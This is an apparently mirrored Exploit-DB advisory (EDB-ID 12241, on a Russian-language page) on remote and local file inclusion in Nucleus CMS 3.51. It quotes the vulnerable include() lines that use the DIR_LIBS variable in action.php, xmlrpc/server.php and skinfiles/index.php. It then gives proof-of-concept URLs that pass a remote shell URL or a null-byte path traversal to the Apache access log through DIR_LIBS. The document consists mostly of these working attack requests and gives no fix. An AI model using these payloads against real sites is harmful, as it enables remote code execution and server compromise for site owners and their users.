- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12241
- Проверка EDB
-
- Пройдено
- Автор
- EIDELWEISS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2010-04-14
Код:
########################################################
Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability
########################################################
____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______ Author:eidelweiss
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/
[+]Software: Nucleus CMS
[+]Version: Nucleus v3.51 (Other or lower version may also be affected)
[+]License: GNU/GPL (Free Software)
[+]Homepage: http://nucleuscms.org/download.php
[+]Download: http://prdownloads.sourceforge.net/nucleuscms/nucleus3.51.zip?download
########################################################
[!]Discovered: eidelweiss
[!]Contact: eidelweiss[at]cyberservices[dot]com
[!]Thank`s: sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db)
JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much to)
########################################################
-=[Description]=-
Nucleus allows you to easily maintain your own weblog(s) on your own server. It offers a system that is easy to install, but still offers maximum flexibility. (PHP4/MySQL)
########################################################
-=[VUln Code]=-
**********************************
[-][path_to_nucleus]/action.php
$CONF = array();
require('./config.php');
// common functions
include_once($DIR_LIBS . 'ACTION.php');
$action = requestVar('action');
$a =& new ACTION();
$errorInfo = $a->doAction($action);
**********************************
[-][path_to_nucleus]/nucleus/xmlrpc/server.php
$CONF = array();
require("../../config.php"); // include Nucleus libs and code
include($DIR_LIBS . "xmlrpc.inc.php");
include($DIR_LIBS . "xmlrpcs.inc.php");
**********************************
[-][path_to_nucleus]/nucleus/plugins/skinfiles/index.php
$strRel = '../../../';
require($strRel . 'config.php');
include($DIR_LIBS . 'PLUGINADMIN.php');
########################################################
-=[ P0C ]=-
Http://127.0.0.1/[path_to_nucleus]/action.php?DIR_LIBS= [inj3ct0r sh3ll]
Http://127.0.0.1/[path_to_nucleus]/nucleus/xmlrpc/server.php?DIR_LIBS= [inj3ct0r sh3ll]
Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00
or
Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=[lfi]%00
###############################=[E0F]=###################################
- Источник
- www.exploit-db.com